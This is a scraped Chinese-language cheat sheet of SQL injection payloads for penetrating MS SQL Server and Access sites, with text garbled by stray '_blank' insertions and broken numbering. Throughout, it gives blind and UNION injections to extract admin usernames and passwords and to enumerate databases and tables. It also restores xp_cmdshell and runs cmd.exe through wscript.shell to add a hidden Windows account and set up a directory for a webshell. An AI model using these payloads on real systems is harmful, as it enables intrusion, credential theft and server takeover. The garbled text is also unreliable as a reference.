渗透常用sql注入语句大全

《渗透常用sql注入语句大全》由会员分享，可在线阅读，更多相关《渗透常用sql注入语句大全（10页珍藏版）》请在金锄头文库上搜索。

1、1.判断有无注入点; and 1=1 and 1=22.猜表一般的表的名称无非是 admin adminuser user pass password 等.and 0(select count(*) from *)and 0(select count(*) from admin) 判断是否存在 admin这张表3.猜帐号数目 如果遇到 00)and 1=(select count(*) from admin where len(用户字段名称 name)0)and 1=(select count(*) from admin where len(_blank密码字段名称password)0)5.猜

2、解各个字段的长度 猜解长度就是把0 变换 直到返回正确页面为止?12345678and 1=(select count(*) from admin where len(*)0)and 1=(select count(*) from admin where len(name)6) 错误and 1=(select count(*) from admin where len(name)5) 正确 长度是 6and 1=(select count(*) from admin where len(name)=6) 正确and 1=(select count(*) from admin where len

3、(password)11) 正确and 1=(select count(*) from admin where len(password)12) 错误 长度是 12and 1=(select count(*) from admin where len(password)=12) 正确6.猜解字符and 1=(select count(*) from admin where left(name,1)=a) 猜解用户帐号的第一位and 1=(select count(*) from admin where left(name,2)=ab)猜解用户帐号的第二位就这样一次加一个字符这样猜,猜到够你刚才

4、猜出来的多少位了就对了,帐号就算出来了and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1)=51) 这个查询语句可以猜解中文的用户和_blank密码.只要把后面的数字换成中文的 ASSIC 码就 OK.最后把结果再转换成字符.?1group by users.id having 1=23456789group by users.id, users.username, users.password, users.privs having 1=1; insert into users values( 666, attacke

5、r, foobar, 0xffff )UNION Select TOP 1 COLUMN_blank_NAME FROM INFORMATION_blank_SCHEMA.COLUMNS Where TABLE_blank_NAME=logintable-UNION Select TOP 1 COLUMN_blank_NAME FROM INFORMATION_blank_SCHEMA.COLUMNS Where TABLE_blank_NAME=logintable Where COLUMN_blank_NAME NOT IN (login_blank_id)-UNION Select TO

6、P 1 COLUMN_blank_NAME FROM INFORMATION_blank_SCHEMA.COLUMNS Where TABLE_blank_NAME=logintable Where COLUMN_blank_NAME NOT IN (login_blank_id,login_blank_name)-UNION Select TOP 1 login_blank_name FROM logintable-UNION Select TOP 1 password FROM logintable where login_blank_name=Rahul看_blank服务器打的补丁=出错

7、了打了 SP4补丁and 1=(select VERSION)看_blank数据库连接账号的权限，返回正常，证明是 _blank服务器角色 sysadmin权限。and 1=(Select IS_blank_SRVROLEMEMBER(sysadmin)判断连接_blank数据库帐号。（采用 SA账号连接 返回正常=证明了连接账号是 SA）?123and sa=(Select System_blank_user)and user_blank_name()=dboand 0(select user_blank_name()看 xp_blank_cmdshell是否删除and 1=(Select

8、count(*) FROM master.dbo.sysobjects Where xtype = X AND name = xp_blank_cmdshell)xp_blank_cmdshell被删除，恢复,支持绝对路径的恢复;EXEC master.dbo.sp_blank_addextendedproc xp_blank_cmdshell,xplog70.dll;EXEC master.dbo.sp_blank_addextendedproc xp_blank_cmdshell,c:inetpubwwwrootxplog70.dll反向 PING自己实验;use master;decla

9、re s int;exec sp_blank_oacreate “wscript.shell”,s out;exec sp_blank_oamethod s,”run”,NULL,”cmd.exe /c ping 192.168.0.1; 加帐号;DECLARE shell INT EXEC SP_blank_OACreate wscript.shell,shell OUTPUT EXEC SP_blank_OAMETHOD shell,run,null, C:WINNTsystem32cmd.exe /c net user jiaoniang$ 1866574 /add创建一个虚拟目录 E盘

10、：;declare o int exec sp_blank_oacreate wscript.shell, o out exec sp_blank_oamethod o, run, NULL, cscript.exe c：inetpubwwwrootmkwebdir.vbs -w “默认 Web站点” -v “e”,”e：” 访问属性：（配合写入一个 webshell）declare o int exec sp_blank_oacreate wscript.shell, o out exec sp_blank_oamethod o, run, NULL, cscript.exe c：inetp

11、ubwwwrootchaccess.vbs -a w3svc/1/ROOT/e +browse爆库 特殊_blank技巧：:%5c= 或者把/和 修改%5 提交and 0(select top 1 paths from newtable)得到库名（从 1到 5都是系统的 id，6 以上才可以判断）and 1=(select name from master.dbo.sysdatabases where dbid=7)and 0(select count(*) from master.dbo.sysdatabases where name1 and dbid=6)依次提交 dbid = 7,8,

12、9. 得到更多的_blank数据库名?123456789and 0(select top 1 name from bbs.dbo.sysobjects where xtype=U) 暴到一个表 假设为 adminand 0(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin) 来得到其他的表。and 0(select count(*) from bbs.dbo.sysobjects where xtype=U and name=adminand uid(str(id) 暴到 UID 的数值

13、假设为 18779569 uid=idand 0(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个 admin 的一个字段,假设为 user_blank_idand 0(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in(id,) 来暴出其他的字段and 0_id from BBS.dbo.admin where username1) 可以得到用户名依次可以得到_blank密码。假设存在 user_blank_id

14、 username ,password 等字段 ?12345678and 0(select count(*) from master.dbo.sysdatabases where name1 and dbid=6)and 0(select top 1 name from bbs.dbo.sysobjects where xtype=U) 得到表名and 0(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address)and 0(select count(*) from bbs.dbo.sysob

15、jects where xtype=U and name=admin and uid(str(id) 判断 id值and 0(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union，access 也好用)得到 WEB路径?12345;create table

16、dbo.swap (swappasschar(255);and (select top 1 swappass from swap)=1;Create TABLE newtable(id int IDENTITY(1,1),paths varchar(500) Declare test varchar(20) exec master.xp_blank_regread rootkey=HKEY_blank_LOCAL_blank_MACHINE, key=SYSTEMCurrentControlSetServicesW3SVCParametersVirtual Roots, value_blank_name=/, values=t